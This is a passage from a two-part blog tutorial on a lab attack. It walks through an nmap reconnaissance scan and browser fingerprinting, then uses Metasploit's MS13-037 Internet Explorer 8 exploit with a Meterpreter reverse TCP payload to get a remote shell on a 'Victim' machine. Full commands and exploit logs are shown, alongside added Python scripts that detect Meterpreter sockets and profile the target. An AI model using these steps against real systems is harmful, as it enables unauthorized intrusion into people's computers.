   windows/vncinject/bind_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
   windows/vncinject/bind_nonx_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/vncinject/bind_tcp                                        normal  VNC Server (Reflective Injection), Bind TCP Stager
   windows/vncinject/bind_tcp_rc4                                    normal  VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption)
   windows/vncinject/reverse_hop_http                                normal  VNC Server (Reflective Injection), Reverse Hop HTTP Stager
   windows/vncinject/reverse_http                                    normal  VNC Server (Reflective Injection), Reverse HTTP Stager
   windows/vncinject/reverse_ipv6_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/vncinject/reverse_nonx_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/vncinject/reverse_ord_tcp                                 normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_tcp                                     normal  VNC Server (Reflective Injection), Reverse TCP Stager
   windows/vncinject/reverse_tcp_allports                            normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   windows/vncinject/reverse_tcp_dns                                 normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   windows/vncinject/reverse_tcp_rc4                                 normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption)
   windows/vncinject/reverse_tcp_rc4_dns                             normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS)

msf exploit(ms13_037_svg_dashstyle) > 

Wow, so many options!  My personal favorite has always been the Windows Meterpreter (Reflective Injection), Reverse TCP Stager.  Meterpreter is an amazing payload that provides a whole host of options.  From the Metasploit Unleashed tutorial:

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

I like the Reverse TCP Stager because of the direction of the connection.  A stager is a small first-stage payload whose only job is to set up a socket and pull the much larger Meterpreter stage across it (that is the "Sending stage" line you will see in the handler output later).  With the reverse stager, Victim opens an outbound TCP connection to our Attacker machine, which is waiting on LHOST:LPORT.  Most host and perimeter firewalls permit outbound connections by default, so the session comes back to us without Victim's firewall getting in the way.  The Bind TCP Stager works the other way around: it makes Victim listen on a port, and we have to connect in to it from Attacker.  Since denying unsolicited inbound connections is the default policy almost everywhere (the Windows firewall included), that inbound connection would likely be dropped and we would never get our session.

All that said, let’s go ahead and use this payload by typing set payload windows/meterpreter/reverse_tcp.  Then type show options to see what payload options are configurable.

msf exploit(ms13_037_svg_dashstyle) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_037_svg_dashstyle) > show options

Module options (exploit/windows/browser/ms13_037_svg_dashstyle):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     clickme          no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   2   IE 8 on Windows 7 SP1 with ntdll.dll Info Leak

msf exploit(ms13_037_svg_dashstyle) > 

We’ll just configure LHOST, the address the payload connects back to (Metasploit also starts the matching handler there).  Since we want the Meterpreter session to come back to our Attacker machine, we’ll set LHOST to 10.0.1.10 by typing set LHOST 10.0.1.10.  We’ll leave LPORT at its default of 4444 for the lab, but be aware that 4444 is Metasploit’s best-known default and exactly what many IDS signatures key on.  Again, we’ll type show options to review our changes one last time before executing the exploit.

msf exploit(ms13_037_svg_dashstyle) > set LHOST 10.0.1.10
LHOST => 10.0.1.10
msf exploit(ms13_037_svg_dashstyle) > show options

Module options (exploit/windows/browser/ms13_037_svg_dashstyle):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     clickme          no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     10.0.1.10        yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   2   IE 8 on Windows 7 SP1 with ntdll.dll Info Leak

msf exploit(ms13_037_svg_dashstyle) > 

Looks like everything’s configured just the way we wanted.  Let’s create the malicious website and serve the payload by typing exploit.

msf exploit(ms13_037_svg_dashstyle) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.10:4444 
[*] Using URL: http://0.0.0.0:80/clickme
[*]  Local IP: http://10.0.1.10:80/clickme
[*] Server started.
msf exploit(ms13_037_svg_dashstyle) > 

Now on our Victim machine, we’ll visit the URL created, http://10.0.1.10/clickme, and see what happens.

[Screenshot: victim_exploit]

From the screenshot above, we can see that Victim was redirected to a second, randomly named URL and that the page stays blank as if it’s still loading.  Eventually, Internet Explorer crashes.

[Screenshot: ie_crash]

So what happened?  Did our exploit fail?  Let’s check our Metasploit console.

msf exploit(ms13_037_svg_dashstyle) > 
[*] 10.0.1.11        ms13_037_svg_dashstyle - Requesting: /clickme
[*] 10.0.1.11        ms13_037_svg_dashstyle - Sending HTML to info leak...
[*] 10.0.1.11        ms13_037_svg_dashstyle - Requesting: /clickme/XssWuvigzg?RvtqQ=1996386480
[*] 10.0.1.11        ms13_037_svg_dashstyle - Using ntdll ROP
[*] 10.0.1.11        ms13_037_svg_dashstyle - Sending HTML to trigger...
[*] Sending stage (770048 bytes) to 10.0.1.11
[*] Meterpreter session 1 opened (10.0.1.10:4444 -> 10.0.1.11:49328) at 2014-11-11 20:22:21 -0600
[*] Session ID 1 (10.0.1.10:4444 -> 10.0.1.11:49328) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3852)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1828
[+] Successfully migrated to process 

This looks promising!  The Metasploit output above is a log of what happened when Victim browsed to our malicious website.  The module served two pages: the first leaked an ntdll.dll address out of the browser (the "info leak" in the target name) so the module could build a ROP chain against that exact copy of ntdll, which is how it gets past ASLR and DEP, and the second triggered the vulnerability itself.  The stager then pulled down the 770 KB Meterpreter stage and session 1 opened.  Immediately after, the InitialAutoRunScript 'migrate -f' spawned a Notepad process in the background (the user can’t see it) and migrated Meterpreter into it.  The reason is that once Internet Explorer crashes and closes, anything running inside iexplore.exe dies with it.  Exploits often leave the target application unstable or crash it outright, so if the Meterpreter session stayed in that process, it would die along with it.  Migration buys the session some staying power, but note that a notepad.exe that suddenly holds an open network connection is also one of the most recognizable Meterpreter tells for anyone watching the host.

A quick look at the Windows Task Manager confirms that Notepad is running in the background with PID 1828, matching the Metasploit output.  We can also see the process is running as user eric, which means our Meterpreter session has eric’s privileges and nothing more; escalating from there is a topic for the final post in the series.

[Screenshot: taskmgr]
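The migrated session described above, and the bind-versus-reverse distinction from earlier, both leave a footprint in Victim's own socket table that a defender can look for.  The following Python script is an added example and not code from the post: it parses the output of the two commands a Windows 7 responder actually has to hand, netstat -ano (sockets with owning PID) and tasklist (PID to image name), and flags an ESTABLISHED connection owned by a process that should never touch the network (the post's notepad.exe, PID 1828, talking to 10.0.1.10:4444) as well as the bind-shell pattern, such a process LISTENING on a port.  The sample output is constructed in the two tools' format; the PIDs and addresses mirror the post, and the calc.exe listener is made up to show the bind case.  The NO_NETWORK_EXPECTED list is an assumption for the example.

```python
"""
Flag the host-side footprint of Meterpreter stagers from `netstat -ano` and
`tasklist` output (Windows 7 era tools, no PowerShell cmdlets required).
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Assumption for the example: images that never legitimately own a socket on a
# workstation. Extend for your own environment.
NO_NETWORK_EXPECTED = {"notepad.exe", "calc.exe", "mspaint.exe", "wordpad.exe"}
# Metasploit's default LPORT, which the post leaves unchanged.
METASPLOIT_DEFAULT_PORTS = {4444}

# "  TCP    10.0.1.11:49328        10.0.1.10:4444         ESTABLISHED     1828"
NETSTAT_TCP_RE = re.compile(
    r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+([A-Z_]+)\s+(\d+)\s*$")
# "notepad.exe                   1828 Console                    1      5,744 K"
TASKLIST_RE = re.compile(
    r"^(?P<image>\S.*?)\s+(?P<pid>\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$")

# Constructed sample output (not captured from the post).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       704
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       2200
  TCP    10.0.1.11:49327        10.0.1.10:80           ESTABLISHED     3852
  TCP    10.0.1.11:49328        10.0.1.10:4444         ESTABLISHED     1828
  UDP    0.0.0.0:500            *:*                                    652
"""
SAMPLE_TASKLIST = """
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System                           4 Services                   0        300 K
svchost.exe                    704 Services                   0      7,236 K
calc.exe                      2200 Console                    1      9,112 K
notepad.exe                   1828 Console                    1      5,744 K
iexplore.exe                  3852 Console                    1     41,920 K
"""


@dataclass(frozen=True)
class Conn:
    local_addr: str
    local_port: int
    remote_addr: str
    remote_port: int
    state: str
    pid: int


@dataclass
class Finding:
    pid: int
    image: str
    conn: Conn
    reasons: List[str] = field(default_factory=list)


def parse_netstat(text: str) -> List[Conn]:
    """Keep only TCP rows; UDP rows have no state column and no remote port."""
    conns = []
    for line in text.splitlines():
        m = NETSTAT_TCP_RE.match(line)
        if m:
            la, lp, ra, rp, state, pid = m.groups()
            conns.append(Conn(la, int(lp), ra, int(rp), state, int(pid)))
    return conns


def parse_tasklist(text: str) -> Dict[int, str]:
    """Map PID -> lower-cased image name; header and ruler lines do not match."""
    images: Dict[int, str] = {}
    for line in text.splitlines():
        m = TASKLIST_RE.match(line)
        if m:
            images[int(m.group("pid"))] = m.group("image").strip().lower()
    return images


def find_suspicious(netstat_text: str, tasklist_text: str) -> List[Finding]:
    """Join sockets to images and apply the two stager heuristics."""
    images = parse_tasklist(tasklist_text)
    findings = []
    for c in parse_netstat(netstat_text):
        image = images.get(c.pid, "<unknown>")
        reasons = []
        if c.state == "ESTABLISHED":            # reverse stager (post-migration)
            if image in NO_NETWORK_EXPECTED:
                reasons.append(f"{image} owns an established connection")
            if c.remote_port in METASPLOIT_DEFAULT_PORTS:
                reasons.append(f"remote port {c.remote_port} is a Metasploit default")
        elif c.state == "LISTENING":            # bind stager
            if image in NO_NETWORK_EXPECTED:
                reasons.append(f"{image} is listening on {c.local_port}")
            if c.local_port in METASPLOIT_DEFAULT_PORTS:
                reasons.append(f"listener on Metasploit default port {c.local_port}")
        if reasons:
            findings.append(Finding(c.pid, image, c, reasons))
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_NETSTAT, SAMPLE_TASKLIST):
        c = f.conn
        print(f"PID {f.pid} {f.image}: {c.local_addr}:{c.local_port} -> "
              f"{c.remote_addr}:{c.remote_port} [{c.state}]")
        for r in f.reasons:
            print("   -", r)
```

Note what this does not catch: iexplore.exe talking to 10.0.1.10 on port 80 looks like any other web browsing, which is exactly why the exploit delivery itself is a job for network monitoring rather than a process list.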

Back in Metasploit, let’s view our open Meterpreter sessions by typing sessions.

msf exploit(ms13_037_svg_dashstyle) > sessions

Active sessions
===============

  Id  Type                   Information                             Connection
  --  ----                   -----------                             ----------
  1   meterpreter x86/win32  WIN-FDN9DNVQ5IR\eric @ WIN-FDN9DNVQ5IR  10.0.1.10:4444 -> 10.0.1.11:49328 (10.0.1.11)

Now let’s interact with the session by typing sessions -i 1.

msf exploit(ms13_037_svg_dashstyle) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > 

As proof that we are in fact remotely connected to Victim, we can type shell to open a Windows command prompt (cmd.exe) and then type ipconfig to verify the IP address of Victim. We can see the IP address is 10.0.1.11. We can also type hostname to confirm that this is the same hostname we saw in our reconnaissance phase.

meterpreter > shell
Process 2936 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\eric\Desktop>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::a0dd:5cb7:b23d:af11%11
   IPv4 Address. . . . . . . . . . . : 10.0.1.11
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.1.1

Tunnel adapter isatap.austin.rr.com:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Tunnel adapter Local Area Connection* 13:

   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : 2001:0:5ef5:79fd:3cfe:11c4:f5ff:fef4
   Link-local IPv6 Address . . . . . : fe80::3cfe:11c4:f5ff:fef4%13
   Default Gateway . . . . . . . . . : ::

Tunnel adapter isatap.{6657C62C-5DA5-4E0B-9C4A-2786A3F83F20}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Users\eric\Desktop>hostname
hostname
WIN-FDN9DNVQ5IR

So what have we accomplished so far?  We set up a client-side exploit by using Metasploit to craft a malicious website that exploited a vulnerability (MS13-037) in an unpatched Internet Explorer 8.  The exploit then loaded a malicious payload that opened a Meterpreter session for us, which we used to remotely access Victim.  Pretty cool, huh?

Hopefully, this will make you think twice about joining “free Wi-Fi” or clicking on suspicious links.  This should also encourage you to keep your software up to date, especially your internet browser.

What’s Next

So far, we’ve seen how easy it is to exploit vulnerabilities and affirmed the importance of maintaining updated software.  In the final part of this series, we’ll further explore Meterpreter and its capabilities including privilege escalation, data exfiltration, and maintaining persistence.


Seeing Red: Reconnaissance

Reconnaissance: Know Your Target

This is part of a series of posts that walk through an attack.

In the last post, we got a brief overview of Kali Linux and some of its capabilities.  In this part, we’ll start to use some of Kali’s tools to perform reconnaissance on our intended target.

In our scenario, we’ll assume we’ve set up a “free wireless network” that we have full control over.  On this network, there are two machines: our Kali instance (“Attacker”) and a machine that has decided to join our wireless network (“Victim”).

Computer   Operating System   IP Address
Attacker   Kali x64           10.0.1.10
Victim     Unknown            10.0.1.11

At this point, we don’t know much about Victim, other than its IP address.  This is where reconnaissance comes in.  The more time we spend performing reconnaissance to gather intelligence and better understand our target, the better our chances of a successful attack.  One of the most popular ways to gather information is the art of port scanning.

Port Scanning: Nmap

When security professionals talk about port scanning, they’re really talking about Nmap.  From Nmap’s website:

Nmap (“Network Mapper”) is a free and open source utility for network discovery and security auditing.

Sounds like just the tool for the job.  Kali, of course, conveniently comes preconfigured with Nmap, ready for use.  Be warned, Nmap is typically not very stealthy and any good security analyst with a decent monitoring system should be able to detect it with relative ease.  That said, most home or public wireless networks are not monitored, and the average user likely is unaware of Nmap, so it can be used without raising too much concern.

Now, using Attacker, we’ll perform a basic port scan on Victim to determine what operating system is running and what services/applications may be vulnerable to an attack.  To do this, we’ll execute Nmap on Kali with the following command (-sS is a TCP SYN scan, which needs root, and -A turns on OS detection, version detection, default scripts, and traceroute in one go):

nmap -sS -A 10.0.1.11

After about a minute, we find some interesting results:

root@kali:~# nmap -sS -A 10.0.1.11

Starting Nmap 6.47 ( http://nmap.org ) at 2014-11-02 21:49 CST
Nmap scan report for 10.0.1.11
Host is up (0.0019s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE     VERSION
135/tcp   open  msrpc       Microsoft Windows RPC
139/tcp   open  netbios-ssn
445/tcp   open  netbios-ssn
49152/tcp open  msrpc       Microsoft Windows RPC
49153/tcp open  msrpc       Microsoft Windows RPC
49154/tcp open  msrpc       Microsoft Windows RPC
49155/tcp open  msrpc       Microsoft Windows RPC
49156/tcp open  msrpc       Microsoft Windows RPC
49157/tcp open  msrpc       Microsoft Windows RPC
MAC Address: 00:0C:29:75:44:FE (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_8
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, or Windows 8
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WIN-FDN9DNVQ5IR, NetBIOS user: , NetBIOS MAC: 00:0c:29:75:44:fe (VMware)
| smb-os-discovery: 
|   OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: WIN-FDN9DNVQ5IR
|   NetBIOS computer name: WIN-FDN9DNVQ5IR
|   Workgroup: WORKGROUP
|_  System time: 2014-11-02T21:50:47-06:00
| smb-security-mode: 
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   1.94 ms 10.0.1.11

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.58 seconds

From this simple network scan, we’ve learned that Victim is running Windows 7 Ultimate SP1 with the usual Windows file and printer sharing services exposed (RPC on 135, NetBIOS on 139, SMB on 445).  Interestingly, the smb-os-discovery script even hands us the computer name, the workgroup, and the current system time, and smb-security-mode reports that SMB message signing is disabled.  Ultimately, this tells us to focus on Windows 7-specific exploits.

We can take it even further and sniff the network (we control it, after all!) to see what else we can learn about Victim.  Running a tool like tcpdump and reading the plaintext HTTP requests, we observe Victim browsing the web and note the User-Agent header:

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Now we know Victim is running Windows 7 SP1 (Windows NT 6.1 in the user agent) and Internet Explorer 8 (MSIE 8.0 with the Trident/4.0 engine).  IE8 was still supported on Windows 7 in 2014, so the user agent alone doesn’t prove the box is unpatched, but IE11 had been available for Windows 7 for a year by then; a user three major browser versions behind is a good bet to have skipped other updates too, and is worth checking against the Windows-based exploits in Metasploit.
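The two paragraphs above do the fingerprinting by eye: read the open ports and the smb-os-discovery answer out of the nmap output, then decode the user agent.  Here is an added Python example (mine, not the post's code) that does the same thing as a parser: it pulls the fields we act on out of nmap's normal text output, decodes the IE user agent using Microsoft's published NT-version and Trident-version tables, and cross-checks the two sources.  The nmap excerpt and user agent embedded below are copied from the post; everything else is the example's own.  It also handles the one trap in IE user agents that the post does not mention: in Compatibility View the MSIE token lies about the version, while the Trident token does not.

```python
"""
Turn nmap console output plus an IE User-Agent header into a target profile.
"""
import re
from typing import Any, Dict

# Windows NT version token in an IE user agent -> product family.
NT_VERSIONS = {
    "5.1": "Windows XP",
    "5.2": "Windows XP x64 / Server 2003",
    "6.0": "Windows Vista / Server 2008",
    "6.1": "Windows 7 / Server 2008 R2",
    "6.2": "Windows 8 / Server 2012",
    "6.3": "Windows 8.1 / Server 2012 R2",
}
# Trident (MSHTML) engine version -> the IE release that ships it. IE in
# Compatibility View reports an older MSIE token but keeps its real Trident
# token, so the engine is the more trustworthy of the two.
TRIDENT_TO_IE = {"4.0": 8, "5.0": 9, "6.0": 10, "7.0": 11}

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
FIELD_RES = {
    "os_details": re.compile(r"^OS details:\s+(.+)$"),        # TCP/IP stack guess (-O)
    "smb_os": re.compile(r"^\|\s+OS:\s+(.+)$"),               # smb-os-discovery, precise
    "hostname": re.compile(r"^\|\s+Computer name:\s+(\S+)"),
    "smb_signing": re.compile(r"^\|_?\s+Message signing (\w+)"),
}

# Copied from the nmap run and the tcpdump observation in the post.
NMAP_OUTPUT = """\
PORT      STATE SERVICE     VERSION
135/tcp   open  msrpc       Microsoft Windows RPC
139/tcp   open  netbios-ssn
445/tcp   open  netbios-ssn
49152/tcp open  msrpc       Microsoft Windows RPC
49153/tcp open  msrpc       Microsoft Windows RPC
49154/tcp open  msrpc       Microsoft Windows RPC
49155/tcp open  msrpc       Microsoft Windows RPC
49156/tcp open  msrpc       Microsoft Windows RPC
49157/tcp open  msrpc       Microsoft Windows RPC
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, or Windows 8
Host script results:
| smb-os-discovery:
|   OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: WIN-FDN9DNVQ5IR
|   Workgroup: WORKGROUP
| smb-security-mode:
|_  Message signing disabled (dangerous, but default)
"""
USER_AGENT = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; "
              ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
              "Media Center PC 6.0)")


def parse_nmap(text: str) -> Dict[str, Any]:
    """Extract open ports and the OS/SMB facts from nmap's normal output."""
    info: Dict[str, Any] = {"open_ports": [], "os_details": None, "smb_os": None,
                            "hostname": None, "smb_signing": None}
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_RE.match(line)
        if m:
            port, _proto, service, version = m.groups()
            info["open_ports"].append((int(port), service, version.strip()))
            continue
        for key, rx in FIELD_RES.items():
            m = rx.match(line)
            if m:
                info[key] = m.group(1).strip()
                break
    return info


def parse_user_agent(ua: str) -> Dict[str, Any]:
    """Decode an IE user agent, preferring the engine token over the MSIE claim."""
    msie = re.search(r"MSIE (\d+)\.(\d+)", ua)
    nt = re.search(r"Windows NT (\d+\.\d+)", ua)
    trident = re.search(r"Trident/(\d+\.\d+)", ua)
    claimed = int(msie.group(1)) if msie else None
    engine = TRIDENT_TO_IE.get(trident.group(1)) if trident else None
    return {
        "claimed_ie_version": claimed,
        "ie_version": engine if engine is not None else claimed,
        "compat_view": engine is not None and claimed is not None and engine != claimed,
        "nt_version": nt.group(1) if nt else None,
        "os": NT_VERSIONS.get(nt.group(1), "unknown NT version") if nt else None,
        "dotnet_clr": re.findall(r"\.NET CLR ([\d.]+)", ua),
    }


def profile_target(nmap_text: str, user_agent: str) -> Dict[str, Any]:
    """Merge both sources and check that they describe the same Windows build."""
    scan = parse_nmap(nmap_text)
    ua = parse_user_agent(user_agent)
    # smb-os-discovery ends its OS string with the NT version in parentheses,
    # e.g. "(Windows 7 Ultimate 6.1)"; compare it with the browser's claim.
    m = re.search(r"(\d+\.\d+)\)\s*$", scan["smb_os"] or "")
    smb_nt = m.group(1) if m else None
    return {**scan, "browser": ua, "smb_nt_version": smb_nt,
            "os_consistent": smb_nt is not None and smb_nt == ua["nt_version"]}


if __name__ == "__main__":
    for key, value in profile_target(NMAP_OUTPUT, USER_AGENT).items():
        print(f"{key}: {value}")
```

The cross-check matters because the nmap stack fingerprint alone only narrows things to "Windows 7, Server 2008, or Windows 8"; it is the SMB script and the browser's NT 6.1 token agreeing that lets us commit to Windows 7 targets in Metasploit.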

What’s Next

So far, we’ve familiarized ourselves with Kali Linux and performed basic reconnaissance.  In the next part, we’ll use the intelligence we gathered to execute a client-side exploit on our target machine.
